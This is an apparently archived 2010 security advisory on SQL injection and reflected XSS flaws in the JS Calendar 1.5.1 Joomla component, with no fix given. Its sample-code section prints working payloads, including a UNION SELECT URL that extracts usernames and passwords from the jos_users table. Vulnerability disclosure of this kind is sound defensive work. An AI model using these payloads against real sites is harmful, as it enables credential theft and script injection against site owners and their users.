Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24910
HistoryOct 13, 2010 - 12:00 a.m.

JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities

2010-10-1300:00:00
vulners.com
16

JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities

Name JS Calendar
Vendor http://www.joomlaseller.com
Versions Affected 1.5.1

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-10-09

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION


JoomlaSeller - Calendar Event is a powerful Joomla!
component which allows you to easily create events and
publish them on a desired date. It is a native build
component for Joomla! 1.5 version and can easily be
installed using the Joomla! back-end Install
functionality.

II. DESCRIPTION


Some parameters are not properly sanitised before being
used in a SQL query or returned to the user.

III. ANALYSIS


Summary:

A) SQL Injection
B) Multiple Reflected XSS

A) SQL Injection


Input passed to "ev_id" parameter is not properly
sanitised before being used in SQL queries. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

B) Multiple XSS


Input passed to the "month" and "year" parameters are
not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML
and script code in a users browser session in context
of an affected site.

IV. SAMPLE CODE


A) SQL Injection

http://site/path/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT
1,username,password,4,5,6,7,8 FROM jos_users

B) Multiple XSS

http://site/path/index.php?option=com_jscalendar&view=jscalendar&month=<script>alert('XSS');</script>

http://site/path/index.php?option=com_jscalendar&view=jscalendar&year=<script>alert('XSS');</script>

V. FIX


No fix.